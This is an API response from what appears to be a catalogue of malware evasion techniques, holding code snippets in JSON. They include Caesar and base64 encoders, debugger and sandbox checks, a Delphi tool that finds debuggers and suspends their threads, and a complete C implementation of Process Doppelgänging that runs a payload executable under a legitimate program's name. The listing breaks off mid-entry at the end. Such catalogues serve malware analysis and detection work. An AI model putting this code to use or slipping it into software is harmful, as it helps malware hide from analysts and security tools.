GET /api/snippets/?page=2
HTTP 200 OK
Allow: GET, POST, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "count": 66,
    "next": null,
    "previous": "https://search.unprotect.it/api/snippets/",
    "results": [
        {
            "language": "https://search.unprotect.it/api/snippet_languages/4/",
            "author": "https://search.unprotect.it/api/snippet_authors/2/",
            "technique": "https://search.unprotect.it/api/techniques/97/",
            "description": "",
            "plain_code": "package main\r\n\r\nimport (\r\n    \"fmt\"\r\n    \"os\"\r\n)\r\n\r\nfunc cipher(text string, direction int) string {\r\n\r\n        shift, offset := rune(3), rune(26)\r\n\trunes := []rune(text)\r\n\r\n        for index, char := range runes {\r\n\t\tswitch direction {\r\n\t\tcase -1: // encoding\r\n\t\t\tif char >= 'a'+shift && char <= 'z' ||\r\n\t\t\t\tchar >= 'A'+shift && char <= 'Z' {\r\n\t\t\t\tchar = char - shift\r\n\t\t\t} else if char >= 'a' && char < 'a'+shift ||\r\n\t\t\t\tchar >= 'A' && char < 'A'+shift {\r\n\t\t\t\tchar = char - shift + offset\r\n\t\t\t}\r\n\t\tcase +1: // decoding\r\n\t\t\tif char >= 'a' && char <= 'z'-shift ||\r\n\t\t\t\tchar >= 'A' && char <= 'Z'-shift {\r\n\t\t\t\tchar = char + shift\r\n\t\t\t} else if char > 'z'-shift && char <= 'z' ||\r\n\t\t\t\tchar > 'Z'-shift && char <= 'Z' {\r\n\t\t\t\tchar = char + shift - offset\r\n\t\t\t}\r\n\t\t}\r\n\t\trunes[index] = char\r\n\t}\r\n\treturn string(runes)\r\n}\r\n\r\nfunc encode(text string) string { return cipher(text, -1) }\r\nfunc decode(text string) string { return cipher(text, +1) }\r\n\r\nfunc main() {\r\n\tsec := os.Args[1]\r\n        fmt.Println(\"[+] Clear text: \" + sec)\r\n\tencoded := encode(sec)\r\n\tfmt.Println(\"[+] Encoded: \" + encoded)\r\n\tdecoded := decode(encoded)\r\n\tfmt.Println(\"[+] Decoded: \" + decoded)\r\n}"
        },
        {
            "language": "https://search.unprotect.it/api/snippet_languages/4/",
            "author": "https://search.unprotect.it/api/snippet_authors/2/",
            "technique": "https://search.unprotect.it/api/techniques/96/",
            "description": "",
            "plain_code": "package main\r\n\r\nimport (\r\n    \"encoding/base64\"\r\n    \"fmt\"\r\n    \"os\"\r\n)\r\n\r\nfunc main() {\r\n\r\n    arg1 := os.Args[1]\r\n\r\n    encoded := base64.StdEncoding.EncodeToString([]byte(arg1))\r\n    fmt.Println(encoded)\r\n\r\n    decoded, err := base64.StdEncoding.DecodeString(encoded)\r\n    if err != nil {\r\n        panic(\"error\")\r\n    }\r\n    fmt.Println(string(decoded))\r\n}"
        },
        {
            "language": "https://search.unprotect.it/api/snippet_languages/2/",
            "author": "https://search.unprotect.it/api/snippet_authors/3/",
            "technique": "https://search.unprotect.it/api/techniques/58/",
            "description": "",
            "plain_code": "#define WIN32_LEAN_AND_MEAN\r\n#include <stdio.h>\r\n#include <iostream>\r\n#include <stdlib.h>\r\n#include <windows.h>\r\n#include \"defs.h\"\r\n\r\n\r\n#pragma comment(lib,\"ntdll.lib\")\r\n#pragma comment(lib,\"psapi.lib\")\r\n\r\n\r\nvoid QueryProcessHeapMethod(void)\r\n{\r\n    PDEBUG_BUFFER buffer;\r\n    buffer = RtlCreateQueryDebugBuffer(0,FALSE);\r\n    RtlQueryProcessHeapInformation(buffer);\r\n\r\n    if (buffer->RemoteSectionBase == (PVOID) 0x50000062){\r\n        MessageBoxA(NULL,\"Debugged\",\"Warning\",MB_OK);\r\n    }\r\n    else {\r\n        MessageBoxA(NULL,\"Not Debugged\",\"Warning\",MB_OK);\r\n    }\r\n    if (buffer->EventPairHandle == (PVOID) 0x00002b98) {\r\n        MessageBoxA(NULL,\"Debugged\",\"Warning\",MB_OK);\r\n    }\r\n    else {\r\n        MessageBoxA(NULL,\"Not Debugged\",\"Warning\",MB_OK);\r\n        printf(\"EventPairHandle= %x\",(int)buffer->EventPairHandle);\r\n    }\r\n}\r\nint main()\r\n{\r\n    QueryProcessHeapMethod();\r\n    return (EXIT_SUCCESS);\r\n}"
        },
        {
            "language": "https://search.unprotect.it/api/snippet_languages/2/",
            "author": "https://search.unprotect.it/api/snippet_authors/3/",
            "technique": "https://search.unprotect.it/api/techniques/119/",
            "description": "",
            "plain_code": "// Ref = src\r\n// https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf\r\n//\r\n// Credits:\r\n//  Vyacheslav Rusakov @swwwolf\r\n//  Tom Bonner @thomas_bonner\r\n//\r\n\r\n#include <Windows.h>\r\n#include <ntstatus.h>\r\n#include \"ntos.h\"\r\n\r\nVOID ProcessDoppelgänging(\r\n    _In_ LPWSTR lpTargetApp,\r\n    _In_ LPWSTR lpPayloadApp)\r\n{\r\n    BOOL bCond = FALSE;\r\n    NTSTATUS status;\r\n    HANDLE hTransaction = NULL, hTransactedFile = INVALID_HANDLE_VALUE, hFile = INVALID_HANDLE_VALUE;\r\n    HANDLE hSection = NULL, hProcess = NULL, hThread = NULL;\r\n    LARGE_INTEGER fsz;\r\n    ULONG ReturnLength = 0;\r\n    ULONG_PTR EntryPoint = 0, ImageBase = 0;\r\n    PVOID Buffer = NULL, MemoryPtr = NULL;\r\n    SIZE_T sz = 0;\r\n    PEB *Peb;\r\n\r\n    PROCESS_BASIC_INFORMATION pbi;\r\n\r\n    PRTL_USER_PROCESS_PARAMETERS ProcessParameters = NULL;\r\n\r\n    OBJECT_ATTRIBUTES obja;\r\n    UNICODE_STRING    ustr;\r\n\r\n    BYTE temp[0x1000];\r\n\r\n    do {\r\n        RtlSecureZeroMemory(&temp, sizeof(temp));\r\n\r\n        //\r\n        // Create TmTx transaction object.\r\n        //\r\n        InitializeObjectAttributes(&obja, NULL, 0, NULL, NULL);\r\n        status = NtCreateTransaction(&hTransaction,\r\n            TRANSACTION_ALL_ACCESS,\r\n            &obja,\r\n            NULL,\r\n            NULL,\r\n            0,\r\n            0,\r\n            0,\r\n            NULL,\r\n            NULL);\r\n\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtCreateTransaction fail\");\r\n            break;\r\n        }\r\n\r\n        //\r\n        // Open target file for transaction.\r\n        //\r\n        hTransactedFile = CreateFileTransacted(lpTargetApp,\r\n            GENERIC_WRITE | GENERIC_READ,\r\n            0,\r\n            NULL,\r\n            OPEN_EXISTING,\r\n            FILE_ATTRIBUTE_NORMAL,\r\n            NULL,\r\n            
hTransaction,\r\n            NULL,\r\n            NULL);\r\n\r\n        if (hTransactedFile == INVALID_HANDLE_VALUE) {\r\n            OutputDebugString(L\"CreateFileTransacted fail\");\r\n            break;\r\n        }\r\n\r\n        //\r\n        // Open file payload.\r\n        //\r\n        hFile = CreateFile(lpPayloadApp,\r\n            GENERIC_READ,\r\n            0,\r\n            NULL,\r\n            OPEN_EXISTING,\r\n            FILE_ATTRIBUTE_NORMAL,\r\n            NULL);\r\n        if (hFile == INVALID_HANDLE_VALUE) {\r\n            OutputDebugString(L\"CreateFile(target) failed\");\r\n            break;\r\n        }\r\n\r\n        //\r\n        // Query payload file size.\r\n        //\r\n        if (!GetFileSizeEx(hFile, &fsz)) {\r\n            OutputDebugString(L\"GetFileSizeEx(target) failed\");\r\n            break;\r\n        }\r\n\r\n        //\r\n        // Allocate buffer for payload file.\r\n        //\r\n        Buffer = NULL;\r\n        sz = (SIZE_T)fsz.LowPart;\r\n        status = NtAllocateVirtualMemory(NtCurrentProcess(),\r\n            &Buffer,\r\n            0,\r\n            &sz,\r\n            MEM_COMMIT | MEM_RESERVE,\r\n            PAGE_READWRITE);\r\n\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtAllocateVirtualMemory(fsz.LowPart) failed\");\r\n            break;\r\n        }\r\n\r\n        //\r\n        // Read payload file to the buffer.\r\n        //\r\n        if (!ReadFile(hFile, Buffer, fsz.LowPart, &ReturnLength, NULL)) {\r\n            OutputDebugString(L\"ReadFile(hFile, Buffer) failed\");\r\n            break;\r\n        }\r\n\r\n        CloseHandle(hFile);\r\n        hFile = INVALID_HANDLE_VALUE;\r\n\r\n        //\r\n        // Write buffer into transaction.\r\n        //\r\n        if (!WriteFile(hTransactedFile, Buffer, fsz.LowPart, &ReturnLength, NULL)) {\r\n            OutputDebugString(L\"WriteFile(hTransactedFile, Buffer) failed\");\r\n            break;\r\n        }\r\n\r\n        
//\r\n        // Create section from transacted file.\r\n        //\r\n        status = NtCreateSection(&hSection,\r\n            SECTION_ALL_ACCESS,\r\n            NULL,\r\n            0,\r\n            PAGE_READONLY,\r\n            SEC_IMAGE,\r\n            hTransactedFile);\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtCreateSection(hTransactedFile) failed\");\r\n            break;\r\n        }\r\n\r\n        status = NtRollbackTransaction(hTransaction, TRUE);\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtRollbackTransaction(hTransaction) failed\");\r\n            break;\r\n        }\r\n\r\n        NtClose(hTransaction);\r\n        hTransaction = NULL;\r\n\r\n        CloseHandle(hTransactedFile);\r\n        hTransactedFile = INVALID_HANDLE_VALUE;\r\n\r\n        //\r\n        // Create process object with transacted section.\r\n        //\r\n        //\r\n        // Warning: due to MS brilliant coding skills (NULL ptr dereference) \r\n        //          this call will trigger BSOD on Windows 10 prior to RS3.\r\n        //\r\n        hProcess = NULL;\r\n        status = NtCreateProcessEx(&hProcess,\r\n            PROCESS_ALL_ACCESS,\r\n            NULL,\r\n            NtCurrentProcess(),\r\n            PS_INHERIT_HANDLES,\r\n            hSection,\r\n            NULL,\r\n            NULL,\r\n            FALSE);\r\n\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtCreateProcessEx(hSection) failed\");\r\n            break;\r\n        }\r\n\r\n        //\r\n        // Query payload file entry point value.\r\n        //\r\n        status = NtQueryInformationProcess(hProcess,\r\n            ProcessBasicInformation,\r\n            &pbi,\r\n            sizeof(PROCESS_BASIC_INFORMATION),\r\n            &ReturnLength);\r\n\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtQueryInformationProcess failed\");\r\n            break;\r\n        }\r\n\r\n        status 
= NtReadVirtualMemory(hProcess, pbi.PebBaseAddress, &temp, 0x1000, &sz);\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtReadVirtualMemory failed\");\r\n            break;\r\n        }\r\n\r\n        EntryPoint = (ULONG_PTR)RtlImageNtHeader(Buffer)->OptionalHeader.AddressOfEntryPoint;\r\n        EntryPoint += (ULONG_PTR)((PPEB)temp)->ImageBaseAddress;\r\n\r\n        //\r\n        // Create process parameters block.\r\n        //\r\n        //RtlInitUnicodeString(&ustr, L\"C:\\\\windows\\\\system32\\\\svchost.exe\");\r\n        RtlInitUnicodeString(&ustr, lpTargetApp);\r\n        status = RtlCreateProcessParametersEx(&ProcessParameters,\r\n            &ustr,\r\n            NULL,\r\n            NULL,\r\n            &ustr,\r\n            NULL,\r\n            NULL,\r\n            NULL,\r\n            NULL,\r\n            NULL,\r\n            RTL_USER_PROC_PARAMS_NORMALIZED);\r\n\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"RtlCreateProcessParametersEx failed\");\r\n            break;\r\n        }\r\n\r\n        //\r\n        // Allocate memory in target process and write process parameters block.\r\n        //\r\n        sz = ProcessParameters->EnvironmentSize + ProcessParameters->MaximumLength;\r\n        MemoryPtr = ProcessParameters;\r\n\r\n        status = NtAllocateVirtualMemory(hProcess,\r\n            &MemoryPtr,\r\n            0,\r\n            &sz,\r\n            MEM_RESERVE | MEM_COMMIT,\r\n            PAGE_READWRITE);\r\n\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtAllocateVirtualMemory(ProcessParameters) failed\");\r\n            break;\r\n        }\r\n\r\n        sz = 0;\r\n        status = NtWriteVirtualMemory(hProcess,\r\n            ProcessParameters,\r\n            ProcessParameters,\r\n            ProcessParameters->EnvironmentSize + ProcessParameters->MaximumLength,\r\n            &sz);\r\n\r\n        if (!NT_SUCCESS(status)) {\r\n            
OutputDebugString(L\"NtWriteVirtualMemory(ProcessParameters) failed\");\r\n            break;\r\n        }\r\n\r\n        //\r\n        // Update PEB->ProcessParameters pointer to newly allocated block.\r\n        //\r\n        Peb = pbi.PebBaseAddress;\r\n        status = NtWriteVirtualMemory(hProcess,\r\n            &Peb->ProcessParameters,\r\n            &ProcessParameters,\r\n            sizeof(PVOID),\r\n            &sz);\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtWriteVirtualMemory(Peb->ProcessParameters) failed\");\r\n            break;\r\n        }\r\n\r\n        //\r\n        // Create primary thread.\r\n        //\r\n        hThread = NULL;\r\n        status = NtCreateThreadEx(&hThread,\r\n            THREAD_ALL_ACCESS,\r\n            NULL,\r\n            hProcess,\r\n            (LPTHREAD_START_ROUTINE)EntryPoint,\r\n            NULL,\r\n            FALSE,\r\n            0,\r\n            0,\r\n            0,\r\n            NULL);\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtCreateThreadEx(EntryPoint) failed\");\r\n            break;\r\n        }\r\n\r\n    } while (bCond);\r\n\r\n    if (hTransaction)\r\n        NtClose(hTransaction);\r\n    if (hSection)\r\n        NtClose(hSection);\r\n    if (hProcess)\r\n        NtClose(hProcess);\r\n    if (hThread)\r\n        NtClose(hThread);\r\n    if (hTransactedFile != INVALID_HANDLE_VALUE)\r\n        CloseHandle(hTransactedFile);\r\n    if (hFile != INVALID_HANDLE_VALUE)\r\n        CloseHandle(hFile);\r\n    if (Buffer != NULL) {\r\n        sz = 0;\r\n        NtFreeVirtualMemory(NtCurrentProcess(), &Buffer, &sz, MEM_RELEASE);\r\n    }\r\n    if (ProcessParameters) {\r\n        RtlDestroyProcessParameters(ProcessParameters);\r\n    }\r\n}\r\n\r\nvoid main()\r\n{\r\n    ProcessDoppelgänging(L\"C:\\\\test\\\\target.exe\", L\"C:\\\\test\\\\payload.exe\");\r\n    ExitProcess(0);\r\n}"
        },
        {
            "language": "https://search.unprotect.it/api/snippet_languages/2/",
            "author": "https://search.unprotect.it/api/snippet_authors/2/",
            "technique": "https://search.unprotect.it/api/techniques/35/",
            "description": "",
            "plain_code": "#include <iostream>\r\n#include <windows.h>\r\n\r\nint WINAPI WinMain ( HINSTANCE, HINSTANCE, LPSTR, int )\r\n{\r\n  char  ComputerName [MAX_COMPUTERNAME_LENGTH + 1];\r\n  DWORD cbComputerName = sizeof ( ComputerName );\r\n\r\n  if ( GetComputerName ( ComputerName, &cbComputerName ))\r\n     { \r\n         MessageBox ( NULL, ComputerName, \"Computer Name:\", MB_OK | MB_ICONINFORMATION ); \r\n     } \r\n}"
        },
        {
            "language": "https://search.unprotect.it/api/snippet_languages/2/",
            "author": "https://search.unprotect.it/api/snippet_authors/2/",
            "technique": "https://search.unprotect.it/api/techniques/31/",
            "description": "",
            "plain_code": "#include \"wtypes.h\"\r\n#include <iostream>\r\nusing namespace std;\r\n\r\n/*\r\n1024x768 can be used for automated Sandbox\r\n800x600 can be used for automated Sandbox\r\n640x480 can be used for automated Sandbox\r\n1024x697\r\n1280x800\r\n1280x960\r\n1680x1050\r\n1916x1066\r\n*/\r\n\r\nvoid GetResolution(int& horiz, int& verti)\r\n{\r\n   RECT desktop;\r\n   const HWND hDesktop = GetDesktopWindow();\r\n   GetWindowRect(hDesktop, &desktop);\r\n   horiz = desktop.right;\r\n   verti = desktop.bottom;\r\n}\r\n\r\nint main()\r\n{\r\n   int horiz = 0;\r\n   int verti = 0;\r\n   GetResolution(horiz, verti);\r\n\r\n   if(horiz < 1024)\r\n   {\r\n      cout << \"[!] Looks like you run in a sandbox!\"<< '\\n';\r\n   }\r\n\r\n   cout << \"[+] Screen resolution: \"<< horiz << \"x\" << verti << '\\n';\r\n   return 0;\r\n}"
        },
        {
            "language": "https://search.unprotect.it/api/snippet_languages/1/",
            "author": "https://search.unprotect.it/api/snippet_authors/1/",
            "technique": "https://search.unprotect.it/api/techniques/109/",
            "description": "You can compile this unit as a classic Delphi Console Application. Feel free to edit both `LFindWindowSignatures` and `LProcessNameSignatures` to support more debuggers.",
            "plain_code": "program SuspendThread;\r\n\r\n{$APPTYPE CONSOLE}\r\n\r\nuses\r\n  WinAPI.Windows, System.SysUtils, Generics.Collections, tlHelp32, Classes;\r\n\r\ntype\r\n  TProcessItem = class\r\n  private\r\n    FName      : String;\r\n    FProcessId : Cardinal;\r\n    FThreads   : TList<Cardinal>;\r\n\r\n    {@M}\r\n    procedure EnumThreads();\r\n  public\r\n    {@C}\r\n    constructor Create(AName : String; AProcessId : Cardinal; AEnumThreads : Boolean = True);\r\n    destructor Destroy(); override;\r\n\r\n    {@G}\r\n    property Name      : String          read FName;\r\n    property ProcessId : Cardinal        read FProcessId;\r\n    property Threads   : TList<Cardinal> read FThreads;\r\n  end;\r\n\r\n  TEnumProcess = class\r\n  private\r\n    FItems : TObjectList<TProcessItem>;\r\n  public\r\n    {@C}\r\n    constructor Create();\r\n    destructor Destroy(); override;\r\n\r\n    {@M}\r\n    function Refresh() : Cardinal;\r\n    procedure Clear();\r\n\r\n    function Get(AProcessId : Cardinal) : TProcessItem; overload;\r\n    function Get(AName : String) : TProcessItem; overload;\r\n\r\n    {@G}\r\n    property Items : TObjectList<TProcessItem> read FItems;\r\n  end;\r\n\r\n{\r\n  Import API's From Kernel32\r\n}\r\nconst THREAD_SUSPEND_RESUME = $00000002;\r\n\r\nfunction OpenThread(\r\n                      dwDesiredAccess: DWORD;\r\n                      bInheritHandle: BOOL;\r\n                      dwThreadId: DWORD\r\n          ) : THandle; stdcall; external kernel32 name 'OpenThread';\r\n\r\n{\r\n  Global Vars\r\n}\r\nvar LFindWindowSignatures  : TDictionary<String, String>;\r\n    LProcessNameSignatures : TStringList;\r\n    LProcesses             : TEnumProcess;\r\n\r\n{+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n  Process Item (Process Name / Process Id / Process Main Thread 
Id)\r\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++}\r\n\r\n{-------------------------------------------------------------------------------\r\n  ___constructor\r\n-------------------------------------------------------------------------------}\r\nconstructor TProcessItem.Create(AName : String; AProcessId : Cardinal; AEnumThreads : Boolean = True);\r\nbegin\r\n  FName      := AName;\r\n  FProcessId := AProcessId;\r\n\r\n  FThreads := TList<Cardinal>.Create();\r\n\r\n  if AEnumThreads then\r\n    self.EnumThreads();\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  ___destructor\r\n-------------------------------------------------------------------------------}\r\ndestructor TProcessItem.Destroy();\r\nbegin\r\n  if Assigned(FThreads) then\r\n    FreeAndNil(FThreads);\r\n\r\n  ///\r\n  inherited Destroy();\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  Enumerate Threads of process object\r\n-------------------------------------------------------------------------------}\r\nprocedure TProcessItem.EnumThreads();\r\nvar ASnap        : THandle;\r\n    AThreadEntry : TThreadEntry32;\r\n\r\n    procedure InitializeItem();\r\n    begin\r\n      ZeroMemory(@AThreadEntry, SizeOf(TThreadEntry32));\r\n\r\n      AThreadEntry.dwSize := SizeOf(TThreadEntry32);\r\n    end;\r\n\r\n    procedure AppendItem();\r\n    begin\r\n      if (AThreadEntry.th32OwnerProcessID <> FProcessId) then\r\n        Exit();\r\n      ///\r\n\r\n      FThreads.Add(AThreadEntry.th32ThreadID);\r\n    end;\r\nbegin\r\n  if NOT Assigned(FThreads) then\r\n    Exit();\r\n  ///\r\n\r\n  FThreads.Clear();\r\n  ///\r\n\r\n  ASnap := CreateToolHelp32Snapshot(TH32CS_SNAPTHREAD, 0);\r\n  if (ASnap = INVALID_HANDLE_VALUE) then\r\n    Exit();\r\n  try\r\n    InitializeItem();\r\n\r\n    if NOT Thread32First(ASnap, AThreadEntry) then\r\n      Exit();\r\n\r\n    AppendItem();\r\n\r\n 
   while True do begin\r\n      InitializeItem();\r\n\r\n      if NOT Thread32Next(ASnap, AThreadEntry) then\r\n        break;\r\n\r\n      AppendItem();\r\n    end;\r\n  finally\r\n    CloseHandle(ASnap);\r\n  end;\r\nend;\r\n\r\n{+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n  Enumerate Process Class\r\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++}\r\n\r\n{-------------------------------------------------------------------------------\r\n  ___constructor\r\n-------------------------------------------------------------------------------}\r\nconstructor TEnumProcess.Create();\r\nbegin\r\n  FItems := TObjectList<TProcessItem>.Create();\r\n  FItems.OwnsObjects := True;\r\n\r\n  ///\r\n  self.Refresh();\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  ___destructor\r\n-------------------------------------------------------------------------------}\r\ndestructor TEnumProcess.Destroy();\r\nbegin\r\n  if Assigned(FItems) then\r\n    FreeAndNil(FItems);\r\n\r\n  ///\r\n  inherited Destroy();\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  Enumerate Running Process.\r\n  @Return: Process Count\r\n-------------------------------------------------------------------------------}\r\nfunction TEnumProcess.Refresh() : Cardinal;\r\nvar ASnap         : THandle;\r\n    AProcessEntry : TProcessEntry32;\r\n\r\n    procedure InitializeItem();\r\n    begin\r\n      ZeroMemory(@AProcessEntry, SizeOf(TProcessEntry32));\r\n\r\n      AProcessEntry.dwSize := SizeOf(TProcessEntry32);\r\n    end;\r\n\r\n    procedure AppendItem();\r\n    var AItem : TProcessItem;\r\n    begin\r\n      AItem := TProcessItem.Create(\r\n                                    AProcessEntry.szExeFile,\r\n                                    AProcessEntry.th32ProcessID,\r\n                                    True {Enum Threads: Default}\r\n      
);\r\n\r\n      FItems.Add(AItem);\r\n    end;\r\n\r\nbegin\r\n  result := 0;\r\n  ///\r\n\r\n  if NOT Assigned(FItems) then\r\n    Exit();\r\n  ///\r\n\r\n  self.Clear();\r\n\r\n  ASnap := CreateToolHelp32Snapshot(TH32CS_SNAPPROCESS, 0);\r\n  if (ASnap = INVALID_HANDLE_VALUE) then\r\n    Exit();\r\n  try\r\n    InitializeItem();\r\n\r\n    if NOT Process32First(ASnap, AProcessEntry) then\r\n      Exit();\r\n\r\n    AppendItem();\r\n\r\n    while True do begin\r\n      InitializeItem();\r\n\r\n      if NOT Process32Next(ASnap, AProcessEntry) then\r\n        break;\r\n\r\n      AppendItem();\r\n    end;\r\n  finally\r\n    CloseHandle(ASnap);\r\n  end;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  Clear Items (Process Objects)\r\n-------------------------------------------------------------------------------}\r\nprocedure TEnumProcess.Clear();\r\nbegin\r\n  if Assigned(FItems) then\r\n    FItems.Clear;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  Get Process Item by Process Id or Name\r\n-------------------------------------------------------------------------------}\r\nfunction TEnumProcess.Get(AProcessId : Cardinal) : TProcessItem;\r\nvar AItem : TProcessItem;\r\n    I     : Integer;\r\nbegin\r\n  result := nil;\r\n  ///\r\n\r\n  for I := 0 to self.Items.count -1 do begin\r\n    AItem := self.Items.Items[I];\r\n    if NOT Assigned(AItem) then\r\n      continue;\r\n    ///\r\n\r\n    if (AItem.ProcessId = AProcessId) then begin\r\n      result := AItem;\r\n\r\n      Break;\r\n    end;\r\n  end;\r\nend;\r\n\r\nfunction TEnumProcess.Get(AName : String) : TProcessItem;\r\nvar AItem : TProcessItem;\r\n    I     : Integer;\r\nbegin\r\n  result := nil;\r\n  ///\r\n\r\n  for I := 0 to self.Items.count -1 do begin\r\n    AItem := self.Items.Items[I];\r\n    if NOT Assigned(AItem) then\r\n      continue;\r\n    ///\r\n\r\n    if (AItem.Name.ToLower = AName.ToLower) 
then begin\r\n      result := AItem;\r\n\r\n      Break;\r\n    end;\r\n  end;\r\nend;\r\n\r\n{+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n  Main\r\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++}\r\n\r\n{-------------------------------------------------------------------------------\r\n  Suspend Threads of target process.\r\n-------------------------------------------------------------------------------}\r\nfunction SuspendThreadsByProcessId(AProcessId : Cardinal) : Boolean;\r\nvar AItem     : TProcessItem;\r\n    AThreadId : Cardinal;\r\n    I         : Integer;\r\n    AThread   : THandle;\r\nbegin\r\n  result := False;\r\n  ///\r\n\r\n  if NOT Assigned(LProcesses) then\r\n    Exit();\r\n\r\n  AItem := LProcesses.Get(AProcessId);\r\n  if NOT Assigned(AItem) then\r\n    Exit();\r\n  ///\r\n\r\n  if (AItem.Threads.count = 0) then\r\n    Exit();\r\n  ///\r\n\r\n  for I := 0 to AItem.Threads.Count -1 do begin\r\n    AThreadId := AItem.Threads.Items[I];\r\n    ///\r\n\r\n    AThread := OpenThread(THREAD_SUSPEND_RESUME, False, AThreadId);\r\n    if (AThread = 0) then\r\n      continue;\r\n    try\r\n      WriteLn(Format('Suspending: %s(%d), Thread Id: %d...', [\r\n                                                                    AItem.Name,\r\n                                                                    AItem.ProcessId,\r\n                                                                    AThreadId\r\n      ]));\r\n\r\n      WinAPI.Windows.SuspendThread(AThread);\r\n\r\n      result := True;\r\n    finally\r\n      CloseHandle(AThread);\r\n    end;\r\n  end;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  FindWindow API Example\r\n-------------------------------------------------------------------------------}\r\nfunction method_FindWindow() : Boolean;\r\nvar AHandle     : THandle;\r\n    AProcessId  : Cardinal;\r\n    AClassName  : 
String;\r\n    AWindowName : String;\r\n    pClassName  : Pointer;\r\n    pWindowName : Pointer;\r\nbegin\r\n  result := False;\r\n  ///\r\n\r\n  for AClassName in LFindWindowSignatures.Keys do begin\r\n    if NOT LFindWindowSignatures.TryGetValue(AClassName, AWindowName) then\r\n      continue;\r\n    ///\r\n\r\n    pClassName  := nil;\r\n    pWindowName := nil;\r\n\r\n    if NOT AClassName.isEmpty then\r\n      pClassName := PWideChar(AClassName);\r\n\r\n    if NOT AWindowName.isEmpty then\r\n      pWindowName := PWideChar(AWindowName);\r\n\r\n    AHandle := FindWindowW(pClassName, pWindowName);\r\n    if (AHandle > 0) then begin\r\n      GetWindowThreadProcessId(AHandle, @AProcessId);\r\n      if (AProcessId > 0) then\r\n        SuspendThreadsByProcessId(AProcessId);\r\n\r\n      ///\r\n      result := True;\r\n    end;\r\n  end;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  Find Process Example (Uses the TEnumProcess Class) - See above\r\n-------------------------------------------------------------------------------}\r\nfunction method_FindProcess() : Boolean;\r\nvar AItem : TProcessItem;\r\n    AName : String;\r\n    I     : Integer;\r\nbegin\r\n  result := False;\r\n  ///\r\n\r\n  for I := 0 to LProcessNameSignatures.count -1 do begin\r\n    AName := LProcessNameSignatures.Strings[I];\r\n\r\n    AItem := LProcesses.Get(AName);\r\n    if (NOT Assigned(AItem)) then\r\n      continue;\r\n    ///\r\n\r\n    SuspendThreadsByProcessId(AItem.ProcessId);\r\n\r\n    ///\r\n    result := True;\r\n  end;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  ___entry\r\n-------------------------------------------------------------------------------}\r\nbegin\r\n  try\r\n    LProcesses := TEnumProcess.Create();\r\n    try\r\n      // FindWindow API\r\n      LFindWindowSignatures := TDictionary<String, String>.Create();\r\n      try\r\n        {\r\n          ...\r\n\r\n   
       @Param1: ClassName  (Empty = NULL)\r\n          @Param2: WindowName (Empty = NULL)\r\n\r\n          Add your own signatures bellow...\r\n        }\r\n        LFindWindowSignatures.Add('OLLYDBG', '');\r\n        {\r\n          ...\r\n        }\r\n        method_FindWindow();\r\n      finally\r\n        if Assigned(LFindWindowSignatures) then\r\n          FreeAndNil(LFindWindowSignatures);\r\n      end;\r\n\r\n      // Find by Process Name\r\n      LProcessNameSignatures := TStringList.Create();\r\n      try\r\n        {\r\n          ...\r\n\r\n          @Param1: Process Name (Example: OllyDbg.exe) - Case Insensitive\r\n\r\n          Add your own signatures bellow...\r\n        }\r\n        LProcessNameSignatures.Add('ImmunityDebugger.exe');\r\n        {\r\n          ...\r\n        }\r\n        method_FindProcess();\r\n      finally\r\n        if Assigned(LProcessNameSignatures) then\r\n          FreeAndNil(LProcessNameSignatures);\r\n      end;\r\n    finally\r\n      if Assigned(LProcesses) then\r\n        FreeAndNil(LProcesses);\r\n    end;\r\n  except\r\n    on E: Exception do\r\n      Writeln(E.ClassName, ': ', E.Message);\r\n  end;\r\nend."
        },
        {
            "language": "https://search.unprotect.it/api/snippet_languages/2/",
            "author": "https://search.unprotect.it/api/snippet_authors/2/",
            "technique": "https://search.unprotect.it/api/techniques/11/",
            "description": "",
